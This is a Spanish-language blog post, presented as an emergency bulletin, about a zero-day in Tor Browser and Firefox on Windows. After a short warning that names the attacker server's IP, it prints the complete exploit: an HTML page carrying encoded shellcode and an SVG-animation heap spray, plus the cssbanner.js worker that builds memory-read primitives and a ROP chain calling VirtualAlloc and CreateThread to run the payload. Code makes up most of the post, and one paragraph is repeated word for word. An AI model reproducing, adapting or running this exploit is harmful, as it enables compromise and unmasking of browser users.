BOLETIN DE EMERGENCIA
Mis estimados lectores.
Publico este boletín de emergencia ya que hace unas cuantas hrs. apareció una nueva vulnerabilidad del tipo 0day en el paquete de navegación anónimo T0R y el navegador FIREFOX que es explotada en sistemas operativos WINDOWS con un 90% de éxito al atacar y afecta las versiones 41 y 50 que es la que la mayoría de todos nosotros tenemos instalada.
EN QUE CONSISTE ESTE EXPLOIT?
Se trata de de una vulverabilidad que explota a JAVASCRIPT activamente usada contra T0R Browser con la generación de un archivo HTML y un CSS, con la cual tienen acceso a la VIRTUALALLOC en la API KERNEL32.DLL.
y conectaba la shell incluida en el oday a un servidor en la IP 5.39.27.226,que ya fue desactivado y estaba localizado en FRANCIA con el prooveedor de servicios OVH y si buscas con SHODAN se puede apreciar que tenia un certificado SSL que es un comodín para el dominio ENERGYCDN
y como podemos ver es un servidor con paginas muy simples y si lo vemos por el lado de ARCHIVE.ORG no ha cambiado su diseño en mas de 3 años desde el 2014.
y conectaba la shell incluida en el oday a un servidor en la IP 5.39.27.226,que ya fue desactivado y estaba localizado en FRANCIA con el prooveedor de servicios OVH y si buscas con SHODAN se puede apreciar que tenia un certificado SSL que es un comodín para el dominio ENERGYCDN
y como podemos ver es un servidor con paginas muy simples y si lo vemos por el lado de ARCHIVE.ORG no ha cambiado su diseño en mas de 3 años desde el 2014.
En búsquedas por google se ve claramente que ese CDN se usa normalmente para poner torrents y cosas pirateadas.
SE RECOMIENDA NO USAR POR EL MOMENTO FIREFOX HASTA QUE SEA PARCHADO EL BUG.
CODIGO DEL EXPLOIT:
----------------------------------------------------------------------
<html> <head> <script> var thecode ='\ue8fc\u0089\u0000\u8960\u31e5\u64d2\u528b\u8b30\u0c52\u528b\u8b14\u2872\ub70f\u264a\uff31\uc031\u3cac\u7c61\u2c02\uc120\u0dcf\uc701\uf0e2\u5752\u528b\u8b10\u3c42\ud001\u408b\u8578\u74c0\u014a\u50d0\u488b\u8b18\u2058\ud301\u3ce3\u8b49\u8b34\ud601\uff31\uc031\uc1ac\u0dcf\uc701\ue038\uf475\u7d03\u3bf8\u247d\ue275\u8b58\u2458\ud301\u8b66\u4b0c\u588b\u011c\u8bd3\u8b04\ud001\u4489\u2424\u5b5b\u5961\u515a\ue0ff\u5f58\u8b5a\ueb12\u5d86\u858d\u0297\u0000\u6850\u774c\u0726\ud5ff\uc085\u840f\u0185\u0000\u858d\u029e\u0000\u6850\u774c\u0726\ud5ff\uc085\u840f\u016f\u0000\u90bb\u0001\u2900\u54dc\u6853\u8029\u006b\ud5ff\udc01\uc085\u850f\u0155\u0000\u5050\u5050\u5040\u5040\uea68\udf0f\uffe0\u31d5\uf7db\u39d3\u0fc3\u3a84\u0001\u8900\u68c3\u2705\ue21b\u6866\u5000\uc931\uc180\u6602\u8951\u6ae2\u5210\u6853\ua599\u6174\ud5ff\uc085\u0874\u8dfe\u0248\u0000\ud775\u00b8\u0001\u2900\u89c4\u52e2\u5250\ub668\ude49\uff01\u5fd5\uc481\u0100\u0000\uc085\u850f\u00f6\u0000\ue857\u00fa\u0000\u895e\u8dca\ua7bd\u0002 \ue800\u00ec\u0000\u834f\u20fa\u057c\u20ba\u0000\u8900\u56d1\ua4f3\u0db9\u0000\u8d00\u8ab5\u0002\uf300\u89a4\u44bd\u0002\u5e00\u6856\u28a9\u8034\ud5ff\uc085\u840f' + '\u00ae\u0000\u8b66\u0a48\u8366\u04f9\u820f\u00a0\u0000\u408d\u8b0c\u8b00\u8b08\ub809\u0100\u0000\u8950\u29e7\u89c4\u57e6\u5156\u6851\u7248\ub8d2\ud5ff\uc085\uc481\u0104\u0000\ub70f\u830f\u06f9\u7072\u06b9\u0000\ub800\u0010\u0000\uc429\ue789\uca89\ue2d1\u5250\ud231\u168a\ud088\uf024\ue8c0\u3c04\u7709\u0404\ueb30\u0402\u8837\u4707\ud088\u0f24\u093c\u0477\u3004\u02eb\u3704\u0788\u4647\ud4e2\u2959\u89cf\u58fe\uc401\ubd8b\u0244\u0000\ua4f3\u36e8\u0000\u3100\u50c0\u2951\u4fcf\u5357\uc268\u38eb\uff5f\uebd5\u6a09\u6800\u1347\u6f72\ud5ff\u6853\u6e75\u614d\ud5ff\uedeb\uc931\ud1f7\uc031\uaef2\ud1f7\uc349\u0000\u0000\u8d03\ua7bd\u0002\ue800\uffe4\uffff\ub94f\u004f\u0000\ub58d\u026e\u0000\ua4f3\ubd8d\u02a7\u0000\ucbe8\uffff\uc3ff\u0a0d\u6341\u6563\u7470\u452d\u636e\u646f\u6e69\u3a67\u6720\u697a\u0d70\u0d0a\u000a\u0a0d\u6f43\u6b6f\u6569\u203a\u434d\u773d\u3273\u335f\u0032\u5049\u4c48\u4150\u4950\u4700\u5445\u2f20\u6130\u3238\u6131\u3038\u302f\u6435\u3063\u3132\u2032\u5448\u5054\u312f\u312e\u0a0d\ u6f48\u7473\u203a\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u4190'; var worker = new Worker('cssbanner.js'); worker.postMessage(thecode); var svgns = 'http://www.w3.org/2000/svg'; var heap80 = new Array(0x1000); var heap100 = new Array(0x4000); var block80 = new ArrayBuffer(0x80); var block100 = new ArrayBuffer(0x100); var sprayBase = undefined; var arrBase = undefined; var animateX = undefined; var containerA = undefined; var offset = 0x90; if (/.*Firefox\/(4[7-9]|[5-9]\d+|[1-9]\d{2,})\..*/.test(navigator.userAgent)) { offset = 0x88; // versions 47.0 or greater } var $ = function(id) { return document.getElementById(id); } var exploit = function() { var u32 = new Uint32Array(block80) u32[0x2] = arrBase - offset; u32[0x8] = arrBase - offset; u32[0xE] = arrBase - offset; for(i = heap100.length/2; i < heap100.length; i++) { heap100[i] = block100.slice(0) } for(i = 0; i < heap80.length/2; i++) { heap80[i] = block80.slice(0) } animateX.setAttribute('begin', '59s') animateX.setAttribute('begin', '58s') for(i = heap80.length/2; i < heap80.length; i++) { heap80[i] = block80.slice(0) } for(i = heap100.length/2; i < heap100.length; i++) { heap100[i] = block100.slice(0) } animateX.setAttribute('begin', '10s') animateX.setAttribute('begin', '9s') window.dump('PAUSING!!! YAYA'); containerA.pauseAnimations(); } worker.onmessage = function(e) { worker.onmessage = function(e) { window.setTimeout(function() { worker.terminate(); document.body.innerHTML = ''; document.getElementsByTagName('head')[0].innerHTML = ''; document.body.setAttribute('onload', '') }, 1000); } arrBase = e.data; exploit(); } var idGenerator = function() { return 'id' + (((1+Math.random())*0x10000)|0).toString(16).substring(1); } var craftDOM = function() { containerA = document.createElementNS(svgns, 'svg') var containerB = document.createElementNS(svgns, 'svg'); animateX = document.createElementNS(svgns, 'animate') var animateA = document.createElementNS(svgns, 'animate') var animateB = document.createElementNS(svgns, 'animate') var animateC = document.createElementNS(svgns, 'animate') var idX = idGenerator(); var idA = idGenerator(); var idB = idGenerator(); var idC = idGenerator(); animateX.setAttribute('id', idX); animateA.setAttribute('id', idA); animateA.setAttribute('end', '50s'); animateB.setAttribute('id', idB); animateB.setAttribute('begin', '60s'); animateB.setAttribute('end', idC + '.end'); animateC.setAttribute('id', idC); animateC.setAttribute('begin', '10s'); animateC.setAttribute('end', idA + '.end'); containerA.appendChild(animateX) containerA.appendChild(animateA) containerA.appendChild(animateB) containerB.appendChild(animateC) document.body.appendChild(containerA); document.body.appendChild(containerB); } window.onload = craftDOM; // </script> <style> #mtdiv{ position: absolute; width: 960px; height: 166px; z-index: 15; top: 100px; left: 50%; margin: 0 0 0 -480px; } </style> </head> <body bgcolor='#2F3236'> <div id='mtdiv'> <img src='mt.png'/> </div> </body> <script> setTimeout('window.location = \'member.php\';', 2000); </script> </html>
====================================================
CONTENIDO DEL cssbanner.js
content of "cssbanner.js": self.onmessage = function(msg) { thecode = msg.data; var pack = function (b) { var a = b >> 16; return String.fromCharCode(b & 65535) + String.fromCharCode(a) }; function Memory(b,a,f){this._base_addr=b;this._read=a;this._write=f;this._abs_read=function(a){a>=this._base_addr?a=this._read(a-this._base_addr):(a=4294967295-this._base_addr+1+a,a=this._read(a));return 0>a?4294967295+a+1:a};this._abs_write=function(a,b){a>=this._base_addr?this._write(a-this._base_addr,b):(a=4294967295-this._base_addr+1+a,this._write(a,b))};this.readByte=function(a){return this.read(a)&255};this.readWord=function(a){return this.read(a)&65535};this.readDword=function(a){return this.read(a)}; this.read=function(a,b){if(a%4){var c=this._abs_read(a&4294967292),d=this._abs_read(a+4&4294967292),e=a%4;return c>>>8*e|d<<8*(4-e)}return this._abs_read(a)};this.readStr=function(a){for(var b="",c=0;;){if(32==c)return"";var d=this.readByte(a+c);if(0==d)break;b+=String.fromCharCode(d);c++}return b};this.write=function(a){}} function PE(b,a){this.mem=b;this.export_table=this.module_base=void 0;this.export_table_size=0;this.import_table=void 0;this.import_table_size=0;this.find_module_base=function(a){for(a&=4294901760;a;){if(23117==this.mem.readWord(a))return this.module_base=a;a-=65536}};this._resolve_pe_structures=function(){peFile=this.module_base+this.mem.readWord(this.module_base+60);if(17744!=this.mem.readDword(peFile))throw"Bad NT Signature";this.pe_file=peFile;this.optional_header=this.pe_file+36;this.export_directory= this.module_base+this.mem.readDword(this.pe_file+120);this.export_directory_size=this.mem.readDword(this.pe_file+124);this.import_directory=this.module_base+this.mem.readDword(this.pe_file+128);this.import_directory_size=this.mem.readDword(this.pe_file+132)};this.resolve_imported_function=function(a,b){void 0==this.import_directory&&this._resolve_pe_structures();for(var e=this.import_directory,c=e+this.import_directory_size;e<c;){var d=this.mem.readStr(this.mem.readDword(e+12)+this.module_base);if(a.toUpperCase()== d.toUpperCase()){for(var c=this.mem.readDword(e)+this.module_base,e=this.mem.readDword(e+16)+this.module_base,d=this.mem.readDword(c),f=0;0!=d;){if(this.mem.readStr(d+this.module_base+2).toUpperCase()==b.toUpperCase())return this.mem.readDword(e+4*f);f++;d=this.mem.readDword(c+4*f)}break}e+=20}return 0};void 0!=a&&this.find_module_base(a)} function ROP(b,a){this.mem=b;this.pe=new PE(b,a);this.pe._resolve_pe_structures();this.module_base=this.pe.module_base+4096;this.findSequence=function(a){for(var b=0;;){for(var e=0,c=0;c<a.length;c++)if(this.mem.readByte(this.module_base+b+c)==a[c]&&e==c)e++;else break;if(e==a.length)return this.module_base+b;b++}};this.findStackPivot=function(){return this.findSequence([148,195])};this.findPopRet=function(a){return this.findSequence([88,195])};this.ropChain=function(a,b,e,c){c=void 0!=c?c:new ArrayBuffer(4096); c=new Uint32Array(c);var d=this.findStackPivot(),f=this.findPopRet("EAX"),g=this.pe.resolve_imported_function("kernel32.dll","VirtualAlloc");c[0]=f+1;c[1]=f;c[2]=a+b+4*e+4;c[3]=d;for(i=0;i<e;i++)c[(b>>2)+i]=d;d=(b+4>>2)+e;c[d++]=g;c[d++]=a+(b+4*e+28);c[d++]=a;c[d++]=4096;c[d++]=4096;c[d++]=64;c[d++]=3435973836;return c}} var conv=new ArrayBuffer(8),convf64=new Float64Array(conv),convu32=new Uint32Array(conv),qword2Double=function(b,a){convu32[0]=b;convu32[1]=a;return convf64[0]},doubleFromFloat=function(b,a){convf64[0]=b;return convu32[a]},sprayArrays=function(){for(var b=Array(262138),a=0;262138>a;a++)b[a]=fzero;for(a=0;a<b.length;a+=512)b[a+1]=memory,b[a+21]=qword2Double(0,2),b[a+14]=qword2Double(arrBase+o1,0),b[a+(o1+8)/8]=qword2Double(arrBase+o2,0),b[a+(o2+0)/8]=qword2Double(2,0),b[a+(o2+8)/8]=qword2Double(arrBase+ o3,arrBase+13),b[a+(o3+0)/8]=qword2Double(16,0),b[a+(o3+24)/8]=qword2Double(2,0),b[a+(o3+32)/8]=qword2Double(arrBase+o5,arrBase+o4),b[a+(o4+0)/8]=qword2Double(0,arrBase+o6),b[a+(o5+0)/8]=qword2Double(arrBase+o7,0),b[a+(o6+8)/8]=qword2Double(2,0),b[a+(o7+8)/8]=qword2Double(arrBase+o7+16,0),b[a+(o7+16)/8]=qword2Double(0,4026531840),b[a+(o7+32)/8]=qword2Double(0,3220176896),b[a+(o7+48)/8]=qword2Double(2,0),b[a+(o7+56)/8]=qword2Double(1,0),b[a+(o7+96)/8]=qword2Double(arrBase+o8,arrBase+o8),b[a+(o7+112)/ 8]=qword2Double(arrBase+o9,arrBase+o9+16),b[a+(o7+168)/8]=qword2Double(0,2),b[a+(o9+0)/8]=qword2Double(arrBase+o10,2),b[a+(o10+0)/8]=qword2Double(2,0),b[a+(o10+8)/8]=qword2Double(0,268435456),b[a+(o11+8)/8]=qword2Double(arrBase+o11+16,0),b[a+(o11+16)/8]=qword2Double(0,4026531840),b[a+(o11+32)/8]=qword2Double(0,3220176896),b[a+(o11+48)/8]=qword2Double(2,0),b[a+(o11+56)/8]=qword2Double(1,0),b[a+(o11+96)/8]=qword2Double(arrBase+o8,arrBase+o8),b[a+(o11+112)/8]=qword2Double(arrBase+o9,arrBase+o9+16),b[a+ (o11+168)/8]=qword2Double(0,2);for(a=0;a<spr.length;a++)spr[a]=b.slice(0)},vtable_offset=300;/.*Firefox\/(41\.0(\.[1-2]|)|42\.0).*/.test(navigator.userAgent)?vtable_offset=304:/.*Firefox\/(4[3-9]|[5-9]\d+|[1-9]\d{2,})\..*/.test(navigator.userAgent)&&(vtable_offset=308); var spr=Array(400),arrBase=805306416,ropArrBuf=new ArrayBuffer(4096),o1=176,o2=256,o3=768,o4=832,o5=864,o6=928,o7=1024,o8=1280,o9=1344,o10=1376,o11=1536,oRop=1792,memory=new Uint32Array(16),len=memory.length,arr_index=0,arr_offset=0;fzero=qword2Double(0,0);0!=thecode.length%2&&(thecode+="\u9090");sprayArrays();postMessage(arrBase); for(memarrayloc=void 0;void 0==memarrayloc;)for(i=0;i<spr.length;i++)for(offset=0;offset<spr[i].length;offset+=512)if("object"!=typeof spr[i][offset+1]){memarrayloc=doubleFromFloat(spr[i][offset+1],0);arr_index=i;arr_offset=offset;spr[i][offset+(o2+0)/8]=qword2Double(65,0);spr[i][offset+(o2+8)/8]=qword2Double(arrBase+o3,memarrayloc+27);for(j=0;33>j;j++)spr[i][offset+(o2+16)/8+j]=qword2Double(memarrayloc+27,memarrayloc+27);spr[i][offset+(o3+8)/8]=qword2Double(0,0);spr[i][offset+(o5+0)/8]=qword2Double(arrBase+ o11,0);spr[i][offset+(o7+168)/8]=qword2Double(0,3);spr[i][offset+(o7+88)/8]=qword2Double(0,2);break}for(;memory.length==len;);var mem=new Memory(memarrayloc+48,function(b){return memory[b/4]},function(b,a){memory[b/4]=a}),xulPtr=mem.readDword(memarrayloc+12);spr[arr_index][arr_offset+1]=ropArrBuf;ropPtr=mem.readDword(arrBase+8);spr[arr_index][arr_offset+1]=null;ropBase=mem.readDword(ropPtr+16);var rop=new ROP(mem,xulPtr);rop.ropChain(ropBase,vtable_offset,10,ropArrBuf); var backupESP=rop.findSequence([137,1,195]),ropChain=new Uint32Array(ropArrBuf);ropChain[0]=backupESP;CreateThread=rop.pe.resolve_imported_function("KERNEL32.dll","CreateThread");for(var i=0;i<ropChain.length&&3435973836!=ropChain[i];i++);ropChain[i++]=3296825488;ropChain[i++]=2048;ropChain[i++]=1347469361;ropChain[i++]=1528949584;ropChain[i++]=3092271187;ropChain[i++]=CreateThread;ropChain[i++]=3096498431;ropChain[i++]=arrBase+16;ropChain[i++]=1955274891;ropChain[i++]=280697892;ropChain[i++]=704643071; ropChain[i++]=2425406428;ropChain[i++]=4294957800;ropChain[i++]=2425393407;for(var j=0;j<thecode.length;j+=2)ropChain[i++]=thecode.charCodeAt(j)+65536*thecode.charCodeAt(j+1);spr[arr_index][arr_offset]=qword2Double(arrBase+16,0);spr[arr_index][arr_offset+3]=qword2Double(0,256);spr[arr_index][arr_offset+2]=qword2Double(ropBase,0);spr[arr_index][arr_offset+(o11+168)/8]=qword2Double(0,3);spr[arr_index][arr_offset+(o11+88)/8]=qword2Double(0,2);postMessage("GREAT SUCCESS"); }; Beautified: self.onmessage = function(msg) { thecode = msg.data; var pack = function (b) { var a = b >> 16; return String.fromCharCode(b & 65535) + String.fromCharCode(a) }; function Memory(b,a,f) { this._base_addr=b; this._read=a; this._write=f; this._abs_read = function(a) { a >= this._base_addr ? a = this._read( a - this._base_addr) : ( a = 4294967295 - this._base_addr + 1 + a, a = this._read(a) ); return 0>a?4294967295+a+1:a }; this._abs_write = function(a,b) { a >= this._base_addr ? this._write(a - this._base_addr, b) : ( a = 4294967295 - this._base_addr + 1 + a, this._write(a,b) ) }; this.readByte = function(a) { return this.read(a) & 255 }; this.readWord = function(a) { return this.read(a) & 65535 }; this.readDword = function(a){ return this.read(a) }; this.read = function(a,b) { if (a%4) { var c = this._abs_read( a & 4294967292), d = this._abs_read( a+4 & 4294967292), e = a%4; return c>>>8*e | d<<8*(4-e) } return this._abs_read(a) }; this.readStr = function(a) { for(var b = "", c = 0;;) { if (32 == c) return ""; var d = this.readByte(a+c); if(0 == d) break; b += String.fromCharCode(d); c++ } return b }; this.write = function(a){} } function PE(b,a) { this.mem = b; this.export_table = this.module_base = void 0; this.export_table_size = 0; this.import_table = void 0; this.import_table_size = 0; this.find_module_base = function(a) { for(a &= 4294901760; a; ) { if(23117 == this.mem.readWord(a)) return this.module_base=a; a -= 65536 } }; this._resolve_pe_structures = function() { peFile = this.module_base + this.mem.readWord(this.module_base+60); if(17744 != this.mem.readDword(peFile)) throw"Bad NT Signature"; this.pe_file = peFile; this.optional_header = this.pe_file+36; this.export_directory = this.module_base+this.mem.readDword(this.pe_file+120); this.export_directory_size = this.mem.readDword(this.pe_file+124); this.import_directory=this.module_base+this.mem.readDword(this.pe_file+128); this.import_directory_size=this.mem.readDword(this.pe_file+132)}; this.resolve_imported_function=function(a,b){ void 0==this.import_directory&&this._resolve_pe_structures(); for(var e=this.import_directory,c=e+this.import_directory_size;e<c;){ var d=this.mem.readStr(this.mem.readDword(e+12)+this.module_base); if(a.toUpperCase()==d.toUpperCase()){ for(var c = this.mem.readDword(e) + this.module_base, e = this.mem.readDword(e+16) + this.module_base, d = this.mem.readDword(c), f = 0 ; 0 !=d ;) { if(this.mem.readStr(d+this.module_base+2).toUpperCase() == b.toUpperCase()) return this.mem.readDword(e+4*f); f++; d = this.mem.readDword(c+4*f) } break } e+=20 } return 0 }; void 0!=a && this.find_module_base(a) } function ROP(b,a){ this.mem = b; this.pe = new PE(b,a); this.pe._resolve_pe_structures(); this.module_base = this.pe.module_base+4096; this.findSequence = function(a) { for(var b=0;;) { for(var e=0,c=0;c<a.length;c++) if(this.mem.readByte(this.module_base+b+c)==a[c]&&e==c) e++; else break; if(e==a.length) return this.module_base+b; b++ } }; this.findStackPivot=function() { return this.findSequence([148,195]) }; this.findPopRet=function(a) { return this.findSequence([88,195]) }; this.ropChain=function(a,b,e,c) { c = void 0 != c ? c : new ArrayBuffer(4096); c = new Uint32Array(c); var d = this.findStackPivot(), f = this.findPopRet("EAX"), g = this.pe.resolve_imported_function("kernel32.dll","VirtualAlloc"); c[0]= f+1; c[1]= f; c[2]= a+b+4*e+4; c[3]= d; for(i=0;i<e;i++) c[(b>>2)+i] = d; d =(b+4>>2)+e; c[d++]=g; c[d++]=a+(b+4*e+28); c[d++]=a; c[d++]=4096; c[d++]=4096; c[d++]=64; c[d++]=3435973836; return c } } var conv=new ArrayBuffer(8), convf64=new Float64Array(conv), convu32=new Uint32Array(conv), qword2Double=function(b,a) { convu32[0]=b; convu32[1]=a; return convf64[0] }, doubleFromFloat = function(b,a) { convf64[0]=b; return convu32[a] }, sprayArrays=function() { for(var b=Array(262138),a=0;262138>a;a++) b[a]=fzero; for(a=0;a<b.length;a+=512) b[a+1] = memory, b[a+21] = qword2Double(0,2), b[a+14] = qword2Double(arrBase+o1,0), b[a+(o1+8)/8] = qword2Double(arrBase+o2,0), b[a+(o2+0)/8] = qword2Double(2,0), b[a+(o2+8)/8] = qword2Double(arrBase+o3,arrBase+13), b[a+(o3+0)/8] = qword2Double(16,0), b[a+(o3+24)/8] = qword2Double(2,0), b[a+(o3+32)/8] = qword2Double(arrBase+o5,arrBase+o4), b[a+(o4+0)/8] = qword2Double(0,arrBase+o6), b[a+(o5+0)/8] = qword2Double(arrBase+o7,0), b[a+(o6+8)/8] = qword2Double(2,0), b[a+(o7+8)/8] = qword2Double(arrBase+o7+16,0), b[a+(o7+16)/8] = qword2Double(0,4026531840), b[a+(o7+32)/8] = qword2Double(0,3220176896), b[a+(o7+48)/8] = qword2Double(2,0), b[a+(o7+56)/8] = qword2Double(1,0), b[a+(o7+96)/8] = qword2Double(arrBase+o8,arrBase+o8), b[a+(o7+112)/8] = qword2Double(arrBase+o9,arrBase+o9+16), b[a+(o7+168)/8] = qword2Double(0,2), b[a+(o9+0)/8] = qword2Double(arrBase+o10,2), b[a+(o10+0)/8] = qword2Double(2,0), b[a+(o10+8)/8] = qword2Double(0,268435456), b[a+(o11+8)/8] = qword2Double(arrBase+o11+16,0), b[a+(o11+16)/8] = qword2Double(0,4026531840), b[a+(o11+32)/8] = qword2Double(0,3220176896), b[a+(o11+48)/8] = qword2Double(2,0), b[a+(o11+56)/8] = qword2Double(1,0), b[a+(o11+96)/8] = qword2Double(arrBase+o8,arrBase+o8), b[a+(o11+112)/8] = qword2Double(arrBase+o9,arrBase+o9+16), b[a+(o11+168)/8] = qword2Double(0,2); for(a=0;a<spr.length;a++) spr[a]=b.slice(0) }, vtable_offset=300; /.*Firefox\/(41\.0(\.[1-2]|)|42\.0).*/.test(navigator.userAgent)? vtable_offset=304 : /.*Firefox\/(4[3-9]|[5-9]\d+|[1-9]\d{2,})\..*/.test(navigator.userAgent) && (vtable_offset=308); var spr=Array(400), arrBase=805306416, ropArrBuf=new ArrayBuffer(4096), o1=176, o2=256, o3=768, o4=832, o5=864, o6=928, o7=1024, o8=1280, o9=1344, o10=1376, o11=1536, oRop=1792, memory=new Uint32Array(16), len=memory.length, arr_index=0, arr_offset=0; fzero=qword2Double(0,0); 0!=thecode.length%2&&(thecode+="\u9090"); sprayArrays(); postMessage(arrBase); for(memarrayloc=void 0;void 0==memarrayloc;) for(i=0;i<spr.length;i++) for(offset=0;offset<spr[i].length;offset+=512) if("object" != typeof spr[i][offset+1]) { memarrayloc=doubleFromFloat(spr[i][offset+1],0); arr_index=i; arr_offset=offset; spr[i][offset+(o2+0)/8]=qword2Double(65,0); spr[i][offset+(o2+8)/8]=qword2Double(arrBase+o3,memarrayloc+27); for(j=0;33>j;j++) spr[i][offset+(o2+16)/8+j]=qword2Double(memarrayloc+27,memarrayloc+27); spr[i][offset+(o3+8)/8]=qword2Double(0,0); spr[i][offset+(o5+0)/8]=qword2Double(arrBase+o11,0); spr[i][offset+(o7+168)/8]=qword2Double(0,3); spr[i][offset+(o7+88)/8]=qword2Double(0,2); break } for(;memory.length==len;); var mem=new Memory(memarrayloc+48, function(b){return memory[b/4]}, function(b,a){memory[b/4]=a}), xulPtr=mem.readDword(memarrayloc+12); spr[arr_index][arr_offset+1]=ropArrBuf; ropPtr=mem.readDword(arrBase+8); spr[arr_index][arr_offset+1]=null; ropBase=mem.readDword(ropPtr+16); var rop=new ROP(mem,xulPtr); rop.ropChain(ropBase,vtable_offset,10,ropArrBuf); var backupESP=rop.findSequence([137,1,195]), ropChain=new Uint32Array(ropArrBuf); ropChain[0]=backupESP; CreateThread=rop.pe.resolve_imported_function("KERNEL32.dll","CreateThread"); for(var i=0;i<ropChain.length&&3435973836!=ropChain[i];i++); ropChain[i++]=3296825488; ropChain[i++]=2048; ropChain[i++]=1347469361; ropChain[i++]=1528949584; ropChain[i++]=3092271187; ropChain[i++]=CreateThread; ropChain[i++]=3096498431; ropChain[i++]=arrBase+16; ropChain[i++]=1955274891; ropChain[i++]=280697892; ropChain[i++]=704643071; ropChain[i++]=2425406428; ropChain[i++]=4294957800; ropChain[i++]=2425393407; for (var j=0;j<thecode.length;j+=2) ropChain[i++]=thecode.charCodeAt(j)+65536*thecode.charCodeAt(j+1); spr[arr_index][arr_offset]=qword2Double(arrBase+16,0); spr[arr_index][arr_offset+3]=qword2Double(0,256); spr[arr_index][arr_offset+2]=qword2Double(ropBase,0); spr[arr_index][arr_offset+(o11+168)/8]=qword2Double(0,3); spr[arr_index][arr_offset+(o11+88)/8]=qword2Double(0,2); postMessage("GREAT SUCCESS"); };
No hay comentarios:
Publicar un comentario